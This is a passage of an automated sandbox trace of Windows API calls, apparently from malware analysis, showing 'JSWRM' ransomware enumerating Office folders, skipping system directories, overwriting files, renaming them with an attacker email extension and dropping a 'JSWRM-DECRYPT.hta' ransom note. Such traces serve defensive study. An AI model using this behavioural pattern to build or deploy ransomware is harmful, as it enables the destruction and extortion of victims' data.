CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB8.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB8.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB8.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB8.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB8.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB8.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub8.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.127] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=59050) returned 1 [0140.127] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.127] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe6a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe6a0, lpOverlapped=0x0) returned 1 [0140.132] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.132] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe6a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe6a0, lpOverlapped=0x0) returned 1 [0140.132] CloseHandle (hObject=0x238) returned 1 [0140.132] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB8.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub8.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB8.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub8.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.133] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bbe, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB9.BDR", cAlternateFileName="")) returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2=".") returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="..") returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="...") returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="windows") returned -1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="recovery") returned -1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="perflogs") returned -1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="documents and settings") returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="$RECYCLE.BIN") returned 1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="system volume information") returned -1 [0140.133] lstrcmpiW (lpString1="MSPUB9.BDR", lpString2="msocache") returned 1 [0140.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB9.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB9.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB9.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB9.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB9.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB9.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB9.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.134] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27582) returned 1 [0140.135] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.135] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6bb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6bb0, lpOverlapped=0x0) returned 1 [0140.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.204] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6bb0, lpOverlapped=0x0) returned 1 [0140.204] CloseHandle (hObject=0x238) returned 1 [0140.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB9.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub9.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB9.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub9.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.207] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bbe, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB9.BDR", cAlternateFileName="")) returned 0 [0140.207] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0140.207] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0460, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2=".") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="..") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="...") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="windows") returned -1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="recovery") returned -1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="perflogs") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="documents and settings") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="$RECYCLE.BIN") returned 1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="system volume information") returned -1 [0140.208] lstrcmpiW (lpString1="PUBCONV.DLL", lpString2="msocache") returned 1 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCONV.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCONV.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBCONV.DLL", lpUsedDefaultChar=0x0) returned 11 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCONV.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCONV.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBCONV.DLL", lpUsedDefaultChar=0x0) returned 11 [0140.208] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf658, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PUBTRAP.DLL", cAlternateFileName="")) returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2=".") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="..") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="...") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="windows") returned -1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="recovery") returned -1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="perflogs") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="documents and settings") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="system volume information") returned -1 [0140.208] lstrcmpiW (lpString1="PUBTRAP.DLL", lpString2="msocache") returned 1 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBTRAP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBTRAP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBTRAP.DLL", lpUsedDefaultChar=0x0) returned 11 [0140.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBTRAP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBTRAP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBTRAP.DLL", lpUsedDefaultChar=0x0) returned 11 [0140.209] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc3bb225, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x241382dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x241382dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PUBWIZ", cAlternateFileName="")) returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2=".") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="..") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="...") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="windows") returned -1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="recovery") returned -1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="perflogs") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="documents and settings") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="$RECYCLE.BIN") returned 1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="system volume information") returned -1 [0140.209] lstrcmpiW (lpString1="PUBWIZ", lpString2="msocache") returned 1 [0140.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\jswrm-decrypt.hta")) returned 0xffffffff [0140.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0140.214] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.214] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0140.215] CloseHandle (hObject=0x45c) returned 1 [0140.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\jswrm-decrypt.hta")) returned 0x20 [0140.215] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc3bb225, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x241382dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4a3bc81f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0140.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.216] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc3bb225, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x241382dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4a3bc81f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.217] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x217f15bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d9e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ACCSBAR.POC", cAlternateFileName="")) returned 1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".") returned 1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="..") returned 1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="...") returned 1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="windows") returned -1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="recovery") returned -1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="perflogs") returned -1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="documents and settings") returned -1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="system volume information") returned -1 [0140.217] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="msocache") returned -1 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCSBAR.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCSBAR.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCSBAR.POC", lpUsedDefaultChar=0x0) returned 11 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCSBAR.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCSBAR.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCSBAR.POC", lpUsedDefaultChar=0x0) returned 11 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCSBAR.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\accsbar.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.219] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11678) returned 1 [0140.219] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.219] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2d90, lpOverlapped=0x0) returned 1 [0140.222] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.223] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2d90, lpOverlapped=0x0) returned 1 [0140.223] CloseHandle (hObject=0x238) returned 1 [0140.224] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCSBAR.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\accsbar.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCSBAR.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\accsbar.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.226] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ACCTBOX.POC", cAlternateFileName="")) returned 1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2=".") returned 1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="..") returned 1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="...") returned 1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="windows") returned -1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="recovery") returned -1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="perflogs") returned -1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="documents and settings") returned -1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="system volume information") returned -1 [0140.226] lstrcmpiW (lpString1="ACCTBOX.POC", lpString2="msocache") returned -1 [0140.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCTBOX.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCTBOX.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCTBOX.POC", lpUsedDefaultChar=0x0) returned 11 [0140.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCTBOX.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCTBOX.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCTBOX.POC", lpUsedDefaultChar=0x0) returned 11 [0140.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.228] 